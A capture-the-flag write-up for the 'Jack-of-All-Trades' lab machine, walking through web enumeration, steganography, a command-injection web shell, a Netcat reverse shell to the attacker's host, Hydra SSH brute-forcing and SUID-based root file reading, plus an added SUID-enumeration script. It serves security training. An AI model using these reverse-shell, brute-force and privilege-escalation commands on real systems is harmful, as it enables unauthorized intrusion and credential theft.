Jack-of-All-Trades
First of all, this write-up is quite long, so be patient and stay tuned: it's a fun box and you may
learn something new. Take your notes and let's jump into this machine.
Starting with enumeration, we're going to use Nmap to see what ports and services are running.
As we can see, there is a web service and SSH, but they sit on unusual ports: HTTP is on 22 and SSH is on 80, so keep that in mind.
Let's go to the website and check it out. But first, Firefox blocks HTTP connections to port 22 by default, so we need to allow it by following these steps:
1- Select and copy the following preference name:
network.security.ports.banned.override
2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful.
3- In the search box above the list, type or paste ports and pause while the list is filtered.
If the above-listed preference exists:
4- Double-click it and add a comma to the end of the list followed by the port number you need to allow. No spaces. Then click OK.
If the above-listed preference does not exist:
5- Right-click anywhere on the page and choose New > String.
6- In the preference name dialog, paste the name you copied and click OK
7- In the preference value dialog, type in the port number you need to allow, then click OK.
After applying these steps, open the URL http://machine-IP:22 (command-line tools such as curl have no such port restriction, so you can fetch the page with them without this change).
Now we get a web page. Let's view its source and see if something is hidden.
As we can see, there is a comment that points to a hidden page, /recovery.php, and an encoded string that we need to decode.
Let's decode that first. It looks like Base64, so you can use an online tool or your terminal.
The decoded note was:
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing!
Also gotta remember your password: you-ganna-found-password-here
We also have a name, so let's search for it.
We find a Twitter account. Take a look at his tweets, because he spells out the exact encoding scheme he uses.
Now let's visit /recovery.php.
It asks for a username and password. Let's take a look at the page source.
There is another encoded string; let's decode it with the scheme Johny Graves tweeted.
The decoded note was:
Remember that the credentials to the recovery login are hidden on the homepage!
I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
Let's visit that link.
I didn't know exactly what this was, but I think he is referring to the dinosaur image on the home page.
So let's save it. You can save it directly, or go to /assets, where you'll find all the pictures used on the home page.
The first one is called stego.jpg, so from its name I think he means we should use steghide.
use: steghide extract -sf stego.jpg
This will extract the hidden data, but you'll be asked for a passphrase: it's the password we found in the first note, the Base64-encoded one.
As you can see, we get a funny message saying this isn't the one xD
So let's try the second one, header.jpg.
Yes, this is it. We now have a username and password to use on the recovery page we found, so let's do it.
After logging in there is a message:
GET me a 'cmd' and I'll run it for you Future-Jack.
I think he writes GET in upper case to refer to the GET method, so we'll pass it in the URL; he also tells us to use cmd, and this technique is not new.
There are web shell payloads shipped with your Kali machine that use the same method. So let's add a cmd parameter, give it a command, and see what happens:
use: http://machine-IP:22/nnxhweOV/index.php?cmd=ls
As we can see, we now have RCE: we were able to list the directory. So I'll use a one-line Netcat reverse shell.
First, set up your Netcat listener:
use: nc -nvlp 4444
Second, use this payload in the cmd parameter (it needs a Netcat build that supports -e, which this target has):
use: nc -e /bin/sh your-machine-IP 4444
*Pro tip: if you want to upgrade the raw Netcat shell to a proper interactive shell, just run this:
/usr/bin/script -qc /bin/bash /dev/null
And now we have our shell.
If we navigate to /home, we find jack's home directory. We can't access it, but next to it there is an interesting file
called jacks_password_list.
cat it, save the list on your machine as a text file, and use Hydra to brute-force SSH with it:
use: hydra -l jack -P jack-passwords-list-path -s 80 ssh://machine-IP
-s 80 tells Hydra that SSH is running on port 80 instead of 22. Go ahead and run it and you'll get jack's password.
After logging in over SSH (remember to point your client at port 80), you'll see only one picture in jack's home directory. Go ahead and download it.
You can copy files off the box with SCP. Run this from the target:
use: scp user.jpg your-username@your-machine-IP:/your-dir
You'll be asked for your local SSH password, since this pushes the file to an SSH server on your machine; alternatively, pull it from your side with scp, again using port 80.
After downloading it, go ahead and just open it. Don't try to do what I did, "trying to extract data from it xD".
You'll find the user flag!
User flag done! ✌
Now it's time for the root flag.
use: sudo -l
Looks like jack can't run any sudo commands! So let's look for SUID binaries instead:
use: find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
As we can see, strings is SUID root, so it reads files with root's privileges!
So let's use it to read the flag:
use: strings /root/root.txt
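The find command above lists every SUID-root file on the box, and on a real system most of them are normal. As an added example (my own shell, not from the original write-up), here is a small helper that runs the same search and flags only the binaries worth a second look, using a short illustrative watch list of programs known to read or execute things as their owner when SUID (strings among them). The watch list, the demo directory and the owner parameter are my assumptions, not something the box defines.

```shell
#!/bin/sh
# Added example, not part of the original write-up.
# Enumerate SUID binaries owned by a given user (root by default), then flag the
# ones on a short, illustrative watch list of binaries that can read or run things
# as their owner when SUID. On this box the hit that matters is strings.

suid_enum() {
  root=${1:-/}
  owner=${2:-root}      # owner is a parameter so the demo below can run unprivileged
  find "$root" -type f -user "$owner" -perm -4000 2>/dev/null | sort
}

# Reads paths on stdin; prints only those whose basename is on the watch list.
flag_interesting() {
  watch="strings find vim vi nano less more awk python python3 perl env bash sh cp mv tar nmap"
  while IFS= read -r path; do
    base=${path##*/}
    for w in $watch; do
      if [ "$base" = "$w" ]; then
        printf '%s\n' "$path"
        break
      fi
    done
  done
}

# Demo: scan the directory given on the command line, e.g.  sh suid_check.sh /usr/bin
# With no argument nothing runs, so the file can also be sourced for its functions.
if [ -n "${1:-}" ]; then
  suid_enum "$1" | flag_interesting
fi
```

Run it with / as the argument on the target and compare against the raw find output: the filtered list is what you would check against a SUID reference such as GTFOBins, and for this box it comes down to strings, which is why `strings /root/root.txt` works.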
That's it, Jack-of-All-Trades rooted! ✌
I hope you enjoyed this fun machine. See you in another one.